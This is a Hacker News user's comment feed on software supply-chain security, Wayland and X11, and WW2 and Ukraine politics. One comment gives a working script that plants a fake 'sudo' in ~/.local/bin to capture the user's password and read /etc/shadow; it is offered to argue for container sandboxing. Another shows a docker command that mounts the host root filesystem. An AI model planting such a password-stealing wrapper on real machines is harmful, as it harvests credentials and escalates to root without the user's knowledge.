Hacker News: sergeykish

New comment by sergeykish in "Maybe you shouldn't install new software for a bit"

sergeykish — Fri, 08 May 2026 13:42:36 +0000

Copy Fail can't affect files it can't access.

PoC attack on k8s [1] claims execution through sibling layers of kube-proxy, host filesystem access through /dev/ [2].

[1] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...

[2] https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kuber...

New comment by sergeykish in "Maybe you shouldn't install new software for a bit"

sergeykish — Fri, 08 May 2026 11:56:19 +0000

Run in docker container:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
    /app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
    /bin/sh: docker: not found

I've described attack from host user and isolating attacker with docker.

New comment by sergeykish in "Maybe you shouldn't install new software for a bit"

sergeykish — Fri, 08 May 2026 11:00:34 +0000

Web pages handled by browsers. Linux desktop running code without sandbox is reckless, relied on verification by distro maintainers, does not work the moment users run proprietary software.

Programming language packages issue only because we don't have zero trust for modules — no restrictions to open socket or file system. Issue is not count, pure function leftPad can't hurt you.

New comment by sergeykish in "Maybe you shouldn't install new software for a bit"

sergeykish — Fri, 08 May 2026 10:26:54 +0000

Linux distributions do not need Copy Fail to get root access:

    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc

    mkdir -p .local/bin/
    cat <.local/bin/sudo
    read -rs -p "[sudo] password for $USER: " PASSWORD
    echo ""
    echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
    EOF

    chmod +x .local/bin/sudo

attack on next sudo call, shows data accessible only to root.

Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh

long term environments defined in docker compose:

    $ docker-compose.yml
    services:
      app:
        image: node:alpine
        volumes:
          - .:/app
        working_dir: /app
        command: /bin/sh
    $ docker compose run app

switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.

New comment by sergeykish in "200 MB RAM FreeBSD desktop"

sergeykish — Sat, 24 Jan 2026 10:30:50 +0000

API is contract. API grants access to screen content, key presses. Users blame Wayland for breaking this contract. Both Wayland and XLibre namespaces brake it. Lunduke mob unable to reason, claims "moving goalposts". Lunduke mob claims improving security is not needed. Lunduke mod wants Linux desktop to be malware can. They claim security improvements for everyone (like defaults on Android) is corporations taking away their freedom. Lunduke mob unable to comprehend Wayland started by XOrg developers who knew X11 flaws. They unable to be thankful for people bringing security to modern expectations.

New comment by sergeykish in "200 MB RAM FreeBSD desktop"

sergeykish — Fri, 23 Jan 2026 10:01:08 +0000

Once you enable XLibre namespaces filtering it breaks screensharing, global hotkeys. Obviously. It is breaking change.

> Doesn't own a mob, and never happened. Horrible accusation, by the way.

Mob unable to response on technical question. To use logic.

> Citation needed.

His YouTube comment section speaks volumes. He manipulates technically uneducated.

New comment by sergeykish in "200 MB RAM FreeBSD desktop"

sergeykish — Fri, 23 Jan 2026 09:55:09 +0000

Xephyr or Xnest sandbox break screensharing, global shortkeys.

You've just confirmed obvious. No way to improve security without breaking changes. And you demand mostly nontechnical users to blacklist applications. That's a recipe for disaster.

New comment by sergeykish in "200 MB RAM FreeBSD desktop"

sergeykish — Thu, 22 Jan 2026 08:18:28 +0000

Name how it's possible to improve security on X11 without breakig changes.

Lunduke made factually wrong claims for hype. His mob are keen to attack Open Source developers.

New comment by sergeykish in "200 MB RAM FreeBSD desktop"

sergeykish — Wed, 21 Jan 2026 18:34:55 +0000

When people believe "they are product", bully Open Source developers for not following their demands and got expected response than entities appear that validate their wrongs for views (money).

Lunduke spreads misinformation. That's anti Open Source, anti community.

New comment by sergeykish in "The state of Schleswig-Holstein is consistently relying on open source"

sergeykish — Sun, 07 Dec 2025 23:17:45 +0000

"Poland provoked occupation by Germany" (1939)? Germany "liberated Czechoslovakia Germans" by occupation and annexation (1938)? How occupation and annexation of neighbors ended for WW2 Germany (1938-1945)?

In 2014 Moscow invaded Ukraine, occupied Crimea, Donetsk, Luhanks. In 2022 Moscow invaded again. No NATO forces in Ukraine. No Moscow forces on NATO members territory. Trump officials unable to answer who started war, you blame NATO, both you and Trump aligned with Moscow.

New comment by sergeykish in "What we talk about when we talk about sideloading"

sergeykish — Wed, 29 Oct 2025 02:50:44 +0000

Windows RT "sideloading" denied for ordinary users, costly for Line-of-Business apps (2012).

Microsoft UWP only Microsoft Store. Microsoft backtracked their walled garden Windows plans for a while as result of Windows Phone fiasco.

Yes, we are.

New comment by sergeykish in "Element: setHTML() method"

sergeykish — Thu, 23 Oct 2025 01:25:01 +0000

So `.setHTML("")` does not set HTML?

New comment by sergeykish in "How I Use Kagi"

sergeykish — Fri, 18 Jul 2025 05:35:46 +0000

Molotov-Ribbentrop Pact — Moscow divided Poland with Germany (1939), invaded Finland (1939), occupied Baltic States (1940) — for two years of WW2 Moscow was Germany ally. After WW2 Moscow occupied half of Europe for 45 years, countries become free less than 50 years ago. Moscow made North Korea and China regimes, still supports dictatorship across the world, occupies and annexes neighbors.

New comment by sergeykish in "How I Use Kagi"

sergeykish — Fri, 18 Jul 2025 05:31:03 +0000

Facts. Do you have no moral ground on WW2 Germany either?

New comment by sergeykish in "How I Use Kagi"

sergeykish — Fri, 18 Jul 2025 05:23:24 +0000

Do you support Oct 7? Do you claim Israel actions are not retaliation? Do you blame Ukraine on fighting occupants?

New comment by sergeykish in "How I Use Kagi"

sergeykish — Fri, 18 Jul 2025 05:20:38 +0000

Majority of Russian Federation population support occupation of Ukraine - independent polls at the start of open invasion. They would stop only when faced consequences.

New comment by sergeykish in "A 1960s schools experiment that created a new alphabet"

sergeykish — Thu, 17 Jul 2025 21:44:27 +0000

English is my third language, first two use phonetic alphabet. Blaming bad spelling on ITA is like German, Spanish speakers blaming own languages.

English spelling is a facade. Real English can be seen when sentences written in IPA. Having visual confirmation of sound feels refreshing.

ITA "lief ov a fisherman" is neither phonetic nor English. It replaced broken system with another broken system.

New comment by sergeykish in "Rust for the small things? but what about Python?"

sergeykish — Mon, 09 Sep 2024 18:31:22 +0000

aws s3 ls s3://bucket/prefix/ --recursive | wc -l

sed 1d

New comment by sergeykish in "How immigration remade the U.S. labor force"

sergeykish — Wed, 04 Sep 2024 08:27:16 +0000

Like in 1607

New comment by sergeykish in "Notes on Tajikistan"

sergeykish — Sat, 29 Jun 2024 16:21:48 +0000

Molotov-Ribbentrop pact — Moscow invaded Finland (1939), occupied Baltic states (1939), divided Poland with Germany (1939). Moscow was Germany ally for two years of WW2. Holodomor (1932-1933): Moscow killed millions without active war. "Great Britain, USA should not have been Moscow ally"?

Moscow invaded Finland in 1939.

Siege of Leningrad was in 1941.

"Poland provoked occupation by Germany" (1939)?